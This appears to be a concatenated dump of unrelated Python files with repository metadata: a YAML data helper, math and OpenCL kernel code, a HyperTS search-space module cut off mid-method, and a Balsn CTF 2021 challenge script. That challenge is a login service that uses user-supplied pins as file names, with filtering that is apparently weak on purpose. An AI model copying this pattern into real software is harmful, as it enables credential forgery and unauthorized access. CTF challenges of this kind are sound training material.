    # Standalone smoke test: run the login form by itself.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    Form = QtWidgets.QWidget()
    ui = Ui_Form()
    ui.setupUi(Form)
    Form.show()
    sys.exit(app.exec_())
| 39.797468 | 114 | 0.661737 |
4aeff121214dfee78d86d9c96293458a719dadb5
| 957 |
py
|
Python
|
skripte/interface.py
|
Ilaris-Tools/IlarisDB
|
9608afa0ebc69c2bbc13af939cb2c71321f5da37
|
[
"MIT"
] | null | null | null |
skripte/interface.py
|
Ilaris-Tools/IlarisDB
|
9608afa0ebc69c2bbc13af939cb2c71321f5da37
|
[
"MIT"
] | 4 |
2022-03-13T22:56:35.000Z
|
2022-03-16T11:33:27.000Z
|
skripte/interface.py
|
Ilaris-dev/IlarisDB
|
9608afa0ebc69c2bbc13af939cb2c71321f5da37
|
[
"MIT"
] | null | null | null |
import yaml
import yamale
class NoAliasDumper(yaml.SafeDumper):
    # yaml.dump normally emits anchors/aliases (&id001 / *id001) for objects
    # that appear more than once; this dumper writes every occurrence in full.
    def ignore_aliases(self, data):
        return True
def load(table):
    """Load and return the YAML data for *table* from ../daten/<table>.yml."""
    with open(f"../daten/{table}.yml", "r") as table_file:
        # yaml.load() without an explicit Loader is unsafe (arbitrary object
        # construction) and deprecated in modern PyYAML; these files are
        # plain data, so safe_load is the correct parser.
        table_data = yaml.safe_load(table_file)
    return table_data
def validate(table, data=None, schemaf=None):
    """Validate a table's YAML data against its yamale schema.

    *schemaf* overrides the schema file name (defaults to *table*);
    *data* defaults to the table's own data file. Raises on schema
    violations, otherwise prints a confirmation and returns True.
    """
    schema_name = schemaf if schemaf else table
    schema = yamale.make_schema(f'../schemata/{schema_name}.yml')
    if data is None:
        data = yamale.make_data(f'../daten/{table}.yml')
    yamale.validate(schema, data, strict=True)
    print("\nYaY! Datei ist ok :)")
    return True
def save(table, data, validate=False):
    """Serialize *data* to ../daten/<table>.yml (aliases expanded, UTF-8).

    When *validate* is truthy the data is checked against the table's
    schema before writing. Bug fix: the parameter shadowed the
    module-level validate() function, so ``validate(table, data)`` tried
    to call a bool and raised TypeError whenever validation was requested.
    """
    if validate:
        # The parameter shadows the module-level validate(); resolve the
        # function explicitly from the module namespace.
        globals()["validate"](table, data)
    dump = yaml.dump(data, default_flow_style=False,
                     allow_unicode=True, Dumper=NoAliasDumper)
    with open(f"../daten/{table}.yml", "w", encoding='utf8') as table_file:
        table_file.write(dump)
| 27.342857 | 75 | 0.642633 |
91ab5c73aaba0afcc0b14306a9cc3bed5d7b43e5
| 623 |
py
|
Python
|
musterloesungen/4.4/hypotenuse.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
musterloesungen/4.4/hypotenuse.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
musterloesungen/4.4/hypotenuse.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Kurs: Python: Grundlagen der Programmierung für Nicht-Informatiker
# Semester: Herbstsemester 2018
# Homepage: http://accaputo.ch/kurs/python-uzh-hs-2018/
# Author: Giuseppe Accaputo
# Aufgabe: 4.4
import math
def hypotenuse(a, b):
    """Return the hypotenuse length for legs *a* and *b*.

    Returns None (implicitly) when either leg is negative, which the
    caller treats as an error signal.
    """
    if a < 0 or b < 0:
        return
    return math.sqrt(a**2 + b**2)
# Demo runs: two valid triangles, then the error case.
print(hypotenuse(0, 0))
print(hypotenuse(3, 4))
result = hypotenuse(-1, 2)
# hypotenuse() signals an invalid (negative) side length by returning None.
if result == None:
    print("Fehler: Eine negative Seitenlänge wurde angegeben")
| 24.92 | 76 | 0.680578 |
72a6db606e9525b89423c77424977159dbbc1bed
| 27 |
py
|
Python
|
my-cs/intern/java_details/java_sort_selection_details/__init__.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
my-cs/intern/java_details/java_sort_selection_details/__init__.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | 15 |
2015-03-07T12:46:41.000Z
|
2015-04-11T09:08:36.000Z
|
buffer/scripts-emb-ext/projects/v8-wrap-gen/sources/v8_api_gen_r16258/matrix.py
|
zaqwes8811/micro-apps
|
7f63fdf613eff5d441a3c2c7b52d2a3d02d9736a
|
[
"MIT"
] | null | null | null |
# Package marker module: records the author tag only.
__author__ = 'zaqwes_user'
| 13.5 | 26 | 0.777778 |
a3e009ccf40de5e9b3b42baa9e366d10feb5593c
| 5,956 |
py
|
Python
|
balsn-2021-writeup/alldata/misc/darkknight/challenge.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
balsn-2021-writeup/alldata/misc/darkknight/challenge.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
balsn-2021-writeup/alldata/misc/darkknight/challenge.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
import os
import shutil
# Per-session scratch directory; the random suffix isolates concurrent runs.
base_dir = f"C:\\Users\\balsnctf\\Documents\\Dark Knight\\tmp-{os.urandom(16).hex()}"
def init():
    """Create the per-session working directory, seeded with two demo credentials."""
    os.mkdir(base_dir)
    os.chdir(base_dir)
    # Pre-registered pin files: each file "<pin>" holds "username\npassword".
    with open("39671", "w") as f:
        f.write("alice\nalice1025")
    with open("683077", "w") as f:
        f.write("bob\nbob0105a")
def password_manager():
    """Interactively register a pin -> (username, password) credential file.

    The pin becomes a filename in the session directory, so it is
    filtered against path separators/traversal and wildcards; username
    and password are stored as two lines inside that file.

    Bug fix: ``flag`` was never reset inside the username and password
    loops, so after one input with a non-printable character every later
    (valid) input was rejected too and the loop could never exit.
    """
    print("use a short pin code to achieve fast login!!")
    while True:
        pin = input("enter a pin code > ")
        if len(pin) > 100:
            print("too long...")
            continue
        if "\\" in pin or "/" in pin or ".." in pin or "*" in pin:
            print("what do you want to do?(¬_¬)")
            continue
        flag = True
        for c in pin.encode("utf8"):
            if c > 0x7e or c < 0x20:
                print("printable chars only!!")
                flag = False
                break
        if flag:
            break
    while True:
        username = input("enter username > ")
        if len(username) > 100:
            print("too long...")
            continue
        # Reset the validity flag for this attempt (previously carried over).
        flag = True
        for c in username.encode("utf8"):
            if c > 0x7e or c < 0x20:
                print("printable chars only!!")
                flag = False
                break
        if flag:
            break
    while True:
        password = input("enter password > ")
        if len(password) > 100:
            print("too long...")
            continue
        # Reset the validity flag for this attempt (previously carried over).
        flag = True
        for c in password.encode("utf8"):
            if c > 0x7e or c < 0x20:
                print("printable chars only!!")
                flag = False
                break
        if flag:
            break
    try:
        with open(pin, "w") as f:
            f.write(username + "\n" + password)
        print("saved!!")
    except OSError:
        # e.g. characters that are invalid in a filename on this OS.
        print("pin is invalid!!")
def safety_guard():
    """Delete every credential file that is malformed or claims to be admin.

    A file is kept only if it holds exactly two non-empty alphanumeric
    lines and the username line is not "admin".
    """
    print("safety guard activated. will delete all unsafe credentials hahaha...")
    delete_file = []
    for pin in os.listdir("."):
        safe = True
        with open(pin, "r") as f:
            data = f.read().split("\n")
            if len(data) != 2:
                safe = False
            elif len(data[0]) == 0 or len(data[1]) == 0:
                safe = False
            elif data[0].isalnum() == False or data[1].isalnum() == False:
                safe = False
            elif data[0] == "admin":
                safe = False
        if safe == False:
            os.remove(pin)
            delete_file.append(pin)
    print(f"finished. delete {len(delete_file)} unsafe credentials: {delete_file}")
def fast_login():
    """Prompt for a pin, read its credential file, return (username, password).

    Returns (None, None) when the pin file is missing or malformed.
    NOTE(review): unlike password_manager, '*' is NOT filtered here —
    only '\\', '/' and '..' are rejected.
    """
    while True:
        pin = input("enter a pin code > ")
        if len(pin) > 100:
            print("too long...")
            continue
        if "\\" in pin or "/" in pin or ".." in pin:
            print("what do you want to do?(¬_¬)")
            continue
        flag = True
        for c in pin.encode("utf8"):
            if c > 0x7e or c < 0x20:
                print("printable chars only!!")
                flag = False
                break
        if flag:
            break
    try:
        with open(pin, "r") as f:
            data = f.read().split("\n")
            if len(data) != 2:
                print("unknown error happened??")
                return None, None
            # First line is the username, second the password.
            return data[0], data[1]
    except FileNotFoundError:
        print("this pin code is not registered.")
        return None, None
def normal_login():
    """Prompt for alphanumeric username/password (max 100 chars each).

    The literal username "admin" is rejected on this path, so admin can
    only be produced via the pin-file (fast) login.
    """
    while True:
        username = input("enter username > ")
        if len(username) > 100:
            print("too long...")
        elif username.isalnum() == False:
            print("strange username, huh?")
        elif username == "admin":
            print("no you are definitely not (╬ Ò ‸ Ó)")
        else:
            break
    while True:
        password = input("enter password > ")
        if len(password) > 100:
            print("too long...")
            continue
        elif password.isalnum() == False:
            print("strange password, huh?")
        else:
            break
    return username, password
def login():
    """Login menu: run the safety guard, then dispatch fast/normal login.

    Prints the flag (after some begging) when the resulting username is
    exactly "admin".
    """
    safety_guard()
    while True:
        print("1. fast login")
        print("2. normal login")
        print("3. exit")
        x = input("enter login type > ")
        if x == "1":
            username, password = fast_login()
        elif x == "2":
            username, password = normal_login()
        elif x == "3":
            print("bye-bye~")
            return
        else:
            print("invalid input.")
            continue
        if username != None and password != None:
            print(f"hello, {username}.")
            if username == "admin":
                while True:
                    x = input("do you want the flag? (y/n): ")
                    if x == "n":
                        print("OK, bye~")
                        return
                    elif x == "y":
                        break
                    else:
                        print("invalid input.")
                while True:
                    x = input("beg me: ")
                    if x == "plz":
                        print("ok, here is your flag: BALSN{flag is here ...}")
                        break
                return
def main():
    """Top-level menu loop; always removes the scratch directory on exit."""
    init()
    try:
        while True:
            print("1. passord manager")
            print("2. login")
            print("3. exit")
            x = input("what do you want to do? > ")
            if x == "1":
                password_manager()
            elif x == "2":
                login()
            elif x == "3":
                print("bye-bye~")
                break
            else:
                print(f"invalid input: {x}")
    except KeyboardInterrupt:
        print("bye-bye~")
    except:
        # NOTE(review): bare except swallows every other error so the
        # cleanup below always runs; `except Exception` + logging would
        # be safer.
        print("unexpected error occured.")
    os.chdir("../")
    shutil.rmtree(base_dir)
# Script entry point.
if __name__ == "__main__":
    main()
| 26.70852 | 85 | 0.442915 |
60c0cd827415a46d31c66b3462e5fe5c9ac90ec0
| 9,435 |
py
|
Python
|
src/visitpy/visit_flow/flow/src/filters/pyocl_kernels.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 226 |
2018-12-29T01:13:49.000Z
|
2022-03-30T19:16:31.000Z
|
src/visitpy/visit_flow/flow/src/filters/pyocl_kernels.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 5,100 |
2019-01-14T18:19:25.000Z
|
2022-03-31T23:08:36.000Z
|
src/visitpy/visit_flow/flow/src/filters/pyocl_kernels.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 84 |
2019-01-24T17:41:50.000Z
|
2022-03-10T10:01:46.000Z
|
# Copyright (c) Lawrence Livermore National Security, LLC and other VisIt
# Project developers. See the top-level LICENSE file for dates and other
# details. No copyright assignment is required to contribute to VisIt.
"""
file: pyocl_kernels.py
author: Cyrus Harrison <[email protected]>
created: 9/6/2012
description:
"""
# Guarded import of pyopencl
# Optional-dependency probe: True only if both numpy and pyopencl import.
found_pyopencl = False
try:
    import numpy as npy
    import pyopencl as cl
    found_pyopencl = True
except ImportError:
    # OpenCL support is optional; callers must check found_pyopencl
    # before using any of the kernels below.
    pass
# Registry of the OpenCL helper kernels, keyed by kernel id.
# Each entry provides:
#   name:        short operation name; create_stub calls "k" + filter_type
#   input_ports: logical input names (length also drives the default in_types)
#   in_types:    optional; "fetch" (load one value per gid) or "direct"
#                (pass the raw __global pointer through) -- defaults to "fetch"
#   out_type:    optional; "float" (default) or "float4"
#   src:         OpenCL C source of the helper function
Kernels = {
    ### add
    "kadd" : {"name": "add",
              "input_ports": ["in_a","in_b"],
              "src":"""
float kadd(const float a,const float b)
{return a + b;}
"""},
    ### sub
    "ksub" : {"name": "sub",
              "input_ports": ["in_a","in_b"],
              "src":"""
float ksub(const float a,const float b)
{return a - b;}
"""},
    ### mult
    "kmult": {"name": "mult",
              "input_ports": ["in_a","in_b"],
              "src":"""
float kmult(const float a,const float b)
{return a * b;}
"""},
    ### div
    "kdiv": {"name": "div",
             "input_ports": ["in_a","in_b"],
             "src":"""
float kdiv(const float a,const float b)
{return a / b;}
"""},
    ### mod
    # BUG FIX: OpenCL C only defines '%' for integer operands; use fmod()
    # for floats.
    "kmod": {"name": "mod",
             "input_ports": ["in_a","in_b"],
             "src":"""
float kmod(const float a, const float b)
{return fmod(a, b);}
"""},
    ### cos
    "kcos" : {"name": "cos",
              "input_ports": ["in"],
              "src":"""
float kcos(const float a)
{return cos(a);}
"""},
    ### sin
    "ksin": {"name": "sin",
             "input_ports": ["in"],
             "src":"""
float ksin(const float a)
{return sin(a);}
"""},
    ### tan
    "ktan": {"name": "tan",
             "input_ports": ["in"],
             "src": """
float ktan(const float a)
{return tan(a);}
"""},
    ### ciel
    # NOTE: the misspelled op name "ciel" is kept for backward compatibility.
    # BUG FIX: the helper was named kceil, which can never match the
    # "k" + filter_type call emitted by create_stub; renamed to kciel.
    "kciel": {"name": "ciel",
              "input_ports": ["in"],
              "src": """
float kciel(const float a)
{return ceil(a);}
"""},
    ### floor
    "kfloor": {"name": "floor",
               "input_ports": ["in"],
               "src":"""
float kfloor(const float a)
{return floor(a);}
"""},
    ### abs
    # BUG FIX: OpenCL's abs() is integer-only; fabs() is the float version.
    "kabs": {"name": "abs",
             "input_ports": ["in"],
             "src":"""
float kabs(const float a)
{return fabs(a);}
"""},
    ### log10
    "klog10": {"name": "log10",
               "input_ports": ["in"],
               "src":"""
float klog10(const float a)
{return log10(a);}
"""},
    ### log
    # BUG FIX: this entry was a copy of klog10 (wrong helper name and wrong
    # math); it now defines klog using the natural logarithm.
    "klog": {"name": "log",
             "input_ports": ["in"],
             "src":"""
float klog(const float a)
{return log(a);}
"""},
    ### exp
    "kexp": {"name": "exp",
             "input_ports": ["in"],
             "src":"""
float kexp(const float a)
{return exp(a);}
"""},
    ### pow
    # BUG FIXES: pow takes two inputs (a single "in" port broke the default
    # in_types fill for two arguments), and the body called itself
    # recursively instead of the built-in pow().
    "kpow": {"name": "pow",
             "input_ports": ["in_a","in_b"],
             "src":"""
float kpow(const float a, const float b)
{return pow(a, b);}
"""},
    ### id
    "kid": {"name": "id",
            "input_ports": ["in"],
            "src":"""
float kid(const float a)
{return a;}
"""},
    ### square
    "ksquare": {"name": "square",
                "input_ports": ["in"],
                "src": """
float ksquare(const float a)
{return a*a;}
"""},
    ### sqrt
    "ksqrt": {"name": "sqrt",
              "input_ports": ["in"],
              "src":"""
float ksqrt(const float a)
{return sqrt(a);}
"""},
    ### curl3d
    # BUG FIXES: the name was a copy/paste leftover ("sqrt"), the third input
    # port duplicated "dfx", the parameter list was missing its closing
    # parenthesis, and the computed result was never returned.
    "curl3d": {"name": "curl3d",
               "input_ports": ["dfx","dfy","dfz"],
               "in_types": ["direct",
                            "direct",
                            "direct"],
               "out_type": "float4",
               "src":"""
float4 kcurl3d(__global const float *dfx,
               __global const float *dfy,
               __global const float *dfz)
{
    int gid = get_global_id(0);
    float dfzdy = dfz[gid*3+1];
    float dfydz = dfy[gid*3+2];
    float dfxdz = dfx[gid*3+2];
    float dfzdx = dfz[gid*3];
    float dfydx = dfy[gid*3];
    float dfxdy = dfx[gid*3+1];
    float4 res;
    res.x = dfzdy - dfydz;
    res.y = dfxdz - dfzdx;
    res.z = dfydx - dfxdy;
    return res;
}
"""},
    ### grad3d
    "kgrad3d": {"name": "grad3d",
                "input_ports": ["in","dims","x","y","z"],
                "in_types": ["direct",
                             "direct",
                             "direct",
                             "direct",
                             "direct"],
                "out_type": "float4",
                "src":"""
float4 kgrad3d(__global const float *v,
               __global const int *d,
               __global const float *x,
               __global const float *y,
               __global const float *z)
{
    int gid = get_global_id(0);
    int di = d[0]-1;
    int dj = d[1]-1;
    int dk = d[2]-1;
    int zi = gid % di;
    int zj = (gid / di) % dj;
    int zk = (gid / di) / dj;
    // for rectilinear, we only need 2 points to get dx,dy,dz
    int pi0 = zi + zj*(di+1) + zk*(di+1)*(dj+1);
    int pi1 = zi + 1 + (zj+1)*(di+1) + (zk+1)*(di+1)*(dj+1);
    float vv = v[gid];
    float4 p_0 = (float4)(x[pi0],y[pi0],z[pi0],1.0);
    float4 p_1 = (float4)(x[pi1],y[pi1],z[pi1],1.0);
    float4 dg = p_1 - p_0;
    // value
    float4 f_0 = (float4)(vv,vv,vv,1.0);
    float4 f_1 = (float4)(vv,vv,vv,1.0);
    // i bounds
    if(zi > 0)
    {
        f_0.x = v[gid-1];
    }
    if(zi < (di-1))
    {
        f_1.x = v[gid+1];
    }
    // j bounds
    if(zj > 0)
    {
        f_0.y = v[gid-di];
    }
    if(zj < (dj-1))
    {
        f_1.y = v[gid+di];
    }
    // k bounds
    if(zk > 0)
    {
        f_0.z = v[gid-(di*dj)];
    }
    if(zk < (dk-1))
    {
        f_1.z = v[gid+(di*dj)];
    }
    float4 df = (f_1 - f_0) / dg;
    // central diff if we aren't on the edges
    if( (zi != 0) && (zi != (di-1)))
    {
        df.x *= .5;
    }
    // central diff if we aren't on the edges
    if( (zj != 0) && (zj != (dj-1)))
    {
        df.y *= .5;
    }
    // central diff if we aren't on the edges
    if( (zk != 0) && (zk != (dk-1)))
    {
        df.z *= .5;
    }
    //return (float4)(1.0,2.0,3.0,0.0);
    return df;
}
"""}
}
# Fill in the optional per-kernel fields with their defaults: a scalar float
# output, and a "fetch" input type for every declared input port.
for entry in Kernels.values():
    entry.setdefault("out_type", "float")
    entry.setdefault("in_types", ["fetch"] * len(entry["input_ports"]))
def create_stub(filter,inputs):
    """Generate the full OpenCL source for a ``kmain`` entry-point kernel.

    Prepends ``filter.kernel_source`` (the helper function definitions) and
    emits a ``__kernel void kmain`` wrapper that declares one __global input
    pointer per element of *inputs*, fetches one value per work item for
    "fetch"-typed inputs (passing the raw pointer through for "direct" ones),
    calls the helper named ``k<filter_type>`` and stores the result in ``out``.

    Note: the parameter is named ``filter`` (shadowing the builtin) for
    API-compatibility; it is expected to expose kernel_source, in_types,
    out_type and filter_type attributes.

    Returns:
        (source, out_dim) -- out_dim is 3 when the helper returns a float4
        (stored as x/y/z triples in ``out``) and None for scalar results.
    """
    # gen stub glue & execute
    ident = "    "
    args_ident = "                          "
    res = filter.kernel_source
    res += "\n%s__kernel void kmain(" % ident
    ninputs = len(inputs)
    # Emit one pointer parameter per input. Python floats are passed via
    # float buffers; numpy int32 arrays map to OpenCL int (padded to the
    # same width as "float" so the generated code lines up).
    for idx in range(ninputs):
        if isinstance(inputs[idx],float):
            itype = "float"
        elif inputs[idx].dtype == npy.int32:
            itype = "int  "
        else:
            itype = "float"
        iname = "in_%04d" % idx
        res += "__global const %s *%s,\n%s " % (itype,iname,args_ident)
    res += "__global float *out)\n"
    res += "%s{\n" % ident
    res += "%s int gid = get_global_id(0);\n" % ident
    call_names = []
    # For "fetch" inputs load the per-work-item value into a local; "direct"
    # inputs are handed to the helper as the raw __global pointer.
    for idx in range(ninputs):
        iname = "in_%04d" % idx
        if filter.in_types[idx] == "fetch":
            if isinstance(inputs[idx],float):
                itype = "float"
            elif inputs[idx].dtype == npy.int32:
                itype = "int  "
            else:
                itype = "float"
            cname = "%s_fetch" % iname
            res += "%s %s %s = %s[gid];\n" % (ident,itype,cname,iname)
        else:
            cname = iname
        call_names.append(cname)
    # Build the helper invocation "k<filter_type>(arg0,arg1,...)"; the
    # slice drops the trailing comma.
    call = "k%s(" % filter.filter_type
    for cn in call_names:
        call += "%s," % cn
    call = call[:-1] + ")"
    out_dim = None
    if filter.out_type == "float":
        res += "%s out[gid] = %s;\n" % (ident,call)
    elif filter.out_type == "float4":
        # float4 results are written as 3 floats per work item (w dropped).
        res += "%s float4 res = %s;\n" % (ident,call)
        res += "%s out[gid*3] = res.x;\n" % (ident)
        res += "%s out[gid*3+1] = res.y;\n" % (ident)
        res += "%s out[gid*3+2] = res.z;\n" % (ident)
        out_dim = 3
    res += "%s}\n" % ident
    return res, out_dim
| 28.248503 | 73 | 0.388977 |
8801d2b5ef8db337473836b1a6fae64413b8f56f
| 11,347 |
py
|
Python
|
hyperts/macro_search_space.py
|
zhangxjohn/HyperTS
|
c43c8d820d26dd362510997c1c294341279ce1e1
|
[
"Apache-2.0"
] | null | null | null |
hyperts/macro_search_space.py
|
zhangxjohn/HyperTS
|
c43c8d820d26dd362510997c1c294341279ce1e1
|
[
"Apache-2.0"
] | null | null | null |
hyperts/macro_search_space.py
|
zhangxjohn/HyperTS
|
c43c8d820d26dd362510997c1c294341279ce1e1
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
"""
"""
import numpy as np
from hyperts.macro_estimators import ProphetForecastEstimator, \
VARForecastEstimator, TSFClassificationEstimator
from hyperts.transformers import TimeSeriesHyperTransformer
from hyperts.utils import consts
from hypernets.tabular import column_selector as tcs
from hypernets.core.ops import HyperInput, ModuleChoice, Optional
from hypernets.core.search_space import HyperSpace, Choice
from hypernets.pipeline.transformers import SimpleImputer, StandardScaler, \
MinMaxScaler, MaxAbsScaler, SafeOrdinalEncoder, AsTypeTransformer
from hypernets.pipeline.base import Pipeline, DataFrameMapper
from hypernets.utils import logging, get_params
logger = logging.get_logger(__name__)
##################################### Define Data Proprecessing Pipeline #####################################
class WithinColumnSelector:
    """Restrict a hypernets column selector to a fixed set of columns.

    Wraps *selector* so it only ever sees the columns of the incoming
    DataFrame that are listed in *selected_cols*.
    """
    def __init__(self, selector, selected_cols):
        self.selector = selector
        self.selected_cols = selected_cols

    def __call__(self, df):
        # BUG FIX: the original indexed the DataFrame with a raw set
        # (df[set(...)]), which modern pandas rejects with a TypeError and
        # which yielded a nondeterministic column order. Select with a list,
        # preserving the DataFrame's own column order.
        intersection = [col for col in df.columns if col in self.selected_cols]
        if len(intersection) > 0:
            selected_df = df[intersection]
            return self.selector(selected_df)
        else:
            return []
def categorical_transform_pipeline(covariables=None, impute_strategy=None, seq_no=0):
    """Build the hyper-pipeline applied to categorical covariate columns.

    The pipeline casts to str, imputes missing values (strategy searchable
    unless fixed by the caller) and ordinal-encodes the result. When
    *covariables* is given, only those columns are considered.
    """
    if impute_strategy is None:
        impute_strategy = Choice(['constant', 'most_frequent'])
    elif isinstance(impute_strategy, list):
        impute_strategy = Choice(impute_strategy)
    steps = [
        AsTypeTransformer(dtype='str', name=f'categorical_as_object_{seq_no}'),
        SimpleImputer(missing_values=np.nan,
                      strategy=impute_strategy,
                      name=f'categorical_imputer_{seq_no}'),
        SafeOrdinalEncoder(name=f'categorical_label_encoder_{seq_no}',
                           dtype='int32')
    ]
    # Restrict the selector to the declared covariables when given.
    if covariables is None:
        column_selector = tcs.column_object_category_bool
    else:
        column_selector = WithinColumnSelector(tcs.column_object_category_bool, covariables)
    return Pipeline(steps, columns=column_selector,
                    name=f'categorical_covariable_transform_pipeline_{seq_no}')
def numeric_transform_pipeline(covariables=None, impute_strategy=None, seq_no=0):
    """Build the hyper-pipeline applied to numeric covariate columns.

    The pipeline imputes missing values (strategy searchable unless fixed by
    the caller) and optionally scales them. When *covariables* is given, only
    those columns are considered.
    """
    if impute_strategy is None:
        impute_strategy = Choice(['mean', 'median', 'constant', 'most_frequent'])
    elif isinstance(impute_strategy, list):
        impute_strategy = Choice(impute_strategy)
    imputer = SimpleImputer(missing_values=np.nan,
                            strategy=impute_strategy,
                            name=f'numeric_imputer_{seq_no}',
                            force_output_as_float=True)
    scaler_options = ModuleChoice(
        [
            StandardScaler(name=f'numeric_standard_scaler_{seq_no}'),
            MinMaxScaler(name=f'numeric_minmax_scaler_{seq_no}'),
            MaxAbsScaler(name=f'numeric_maxabs_scaler_{seq_no}')
        ], name=f'numeric_or_scaler_{seq_no}'
    )
    scaler_optional = Optional(scaler_options, keep_link=True, name=f'numeric_scaler_optional_{seq_no}')
    # BUG FIX: the original tested `if covariables == None:` -- both a
    # non-idiomatic None comparison and an inverted condition (it wrapped the
    # selector only when there were NO covariables). Mirror the logic of
    # categorical_transform_pipeline.
    if covariables is not None:
        cs = WithinColumnSelector(tcs.column_number_exclude_timedelta, covariables)
    else:
        cs = tcs.column_number_exclude_timedelta
    pipeline = Pipeline([imputer, scaler_optional], columns=cs,
                        name=f'numeric_covariate_transform_pipeline_{seq_no}')
    return pipeline
##################################### Define Base Search Space Generator #####################################
class _HyperEstimatorCreator:
def __init__(self, cls, init_kwargs, fit_kwargs):
super(_HyperEstimatorCreator, self).__init__()
self.estimator_cls = cls
self.estimator_fit_kwargs = fit_kwargs if fit_kwargs is not None else {}
self.estimator_init_kwargs = init_kwargs if init_kwargs is not None else {}
def __call__(self, *args, **kwargs):
return self.estimator_cls(self.estimator_fit_kwargs, **self.estimator_init_kwargs)
class BaseSearchSpaceGenerator:
    """Template for search-space builders.

    Subclasses provide `estimators`; __call__ assembles a HyperSpace wiring
    input -> preprocessing pipelines -> a ModuleChoice over the estimators.
    Options given at construction or call time are routed to matching
    estimator init kwargs; anything unmatched is broadcast to fit kwargs.
    """
    def __init__(self, **kwargs) -> None:
        super().__init__()
        # Free-form options, consumed destructively (dict.pop) on a merged
        # copy each time the space is materialized.
        self.options = kwargs
    @property
    def estimators(self):
        # Mapping: name -> (estimator_class, init_kwargs, fit_kwargs).
        raise NotImplementedError
    def create_preprocessor(self, hyper_input, options):
        """Build the covariate/timestamp preprocessing DataFrameMapper."""
        dataframe_mapper_default = options.pop('dataframe_mapper_default', False)
        covariables = options.pop('covariables', None)
        timestamp = options.pop('timestamp', None)
        pipelines = []
        if covariables is not None:
            # category
            pipelines.append(categorical_transform_pipeline(covariables=covariables)(hyper_input))
            # numeric
            pipelines.append(numeric_transform_pipeline(covariables=covariables)(hyper_input))
        # timestamp
        if timestamp is not None:
            pipelines.append(Pipeline([TimeSeriesHyperTransformer()],
                                      columns=[timestamp],
                                      name=f'timestamp_transform_pipeline_0')(hyper_input))
        preprocessor = DataFrameMapper(default=dataframe_mapper_default, input_df=True, df_out=True,
                                       df_out_dtype_transforms=[(tcs.column_object, 'int')])(pipelines)
        return preprocessor
    def create_estimators(self, hyper_input, options):
        """Instantiate the enabled estimators and expose them as a ModuleChoice."""
        assert len(self.estimators.keys()) > 0
        # One deferred creator per estimator; per-estimator overrides come
        # from '<name>_init_kwargs' / '<name>_fit_kwargs' entries in options.
        creators = [_HyperEstimatorCreator(pairs[0],
                                           init_kwargs=self._merge_dict(pairs[1],
                                                                        options.pop(f'{k}_init_kwargs', None)),
                                           fit_kwargs=self._merge_dict(pairs[2], options.pop(f'{k}_fit_kwargs', None)))
                    for k, pairs in self.estimators.items()]
        unused = {}
        # Route the remaining flat options: a key matching some estimator's
        # init kwargs overrides it in place; keys matching fit kwargs are
        # considered consumed; anything never matched is collected and
        # broadcast to every estimator's fit kwargs below.
        for k, v in options.items():
            used = False
            for c in creators:
                if k in c.estimator_init_kwargs.keys():
                    c.estimator_init_kwargs[k] = v
                    used = True
                if k in c.estimator_fit_kwargs.keys():
                    used = True
            if not used:
                unused[k] = v
        if len(unused) > 0:
            for c in creators:
                c.estimator_fit_kwargs.update(unused)
        estimators = [c() for c in creators]
        return ModuleChoice(estimators, name='estimator_options')(hyper_input)
    def __call__(self, *args, **kwargs):
        """Materialize the HyperSpace (construction + call-time options merged)."""
        options = self._merge_dict(self.options, kwargs)
        space = HyperSpace()
        with space.as_default():
            hyper_input = HyperInput(name='input1')
            # Chain: raw input -> preprocessor -> estimator module choice.
            self.create_estimators(self.create_preprocessor(hyper_input, options), options)
            space.set_inputs(hyper_input)
        return space
    def _merge_dict(self, *args):
        # Shallow merge; later dicts win, non-dict arguments are ignored.
        d = {}
        for a in args:
            if isinstance(a, dict):
                d.update(a)
        return d
    def __repr__(self):
        params = get_params(self)
        params.update(self.options)
        repr_ = ', '.join(['%s=%r' % (k, v) for k, v in params.items()])
        return f'{type(self).__name__}({repr_})'
##################################### Define Specific Search Space Generator #####################################
class StatsForecastSearchSpace(BaseSearchSpaceGenerator):
    """Search space over classical statistical forecasters.

    Univariate tasks search over Prophet; multivariate tasks over VAR.
    """
    def __init__(self, task, timestamp=None,
                 enable_prophet=True,
                 enable_var=True,
                 **kwargs):
        kwargs['timestamp'] = timestamp
        print("Tip: If other parameters exist, set them directly. For example, covariables=['is_holiday'].")
        super().__init__(**kwargs)
        self.task = task
        self.timestamp = timestamp
        self.enable_prophet = enable_prophet
        self.enable_var = enable_var
    @property
    def default_prophet_init_kwargs(self):
        # Hyperparameter search ranges for Prophet.
        return {
            'n_changepoints': Choice([25, 35, 45]),
            'interval_width': Choice([0.6, 0.7, 0.8]),
            'seasonality_mode': Choice(['additive', 'multiplicative'])
        }
    @property
    def default_prophet_fit_kwargs(self):
        return {'timestamp': self.timestamp}
    @property
    def default_var_init_kwargs(self):
        # Hyperparameter search ranges for VAR.
        return {
            'ic': Choice(['aic', 'fpe', 'hqic', 'bic']),
            'trend': Choice(['c', 'ct', 'ctt', 'nc', 'n']),
            'y_scale': Choice(['min_max', 'max_abs', 'identity']),
            'y_log': Choice(['logx', 'none'])
        }
    @property
    def default_var_fit_kwargs(self):
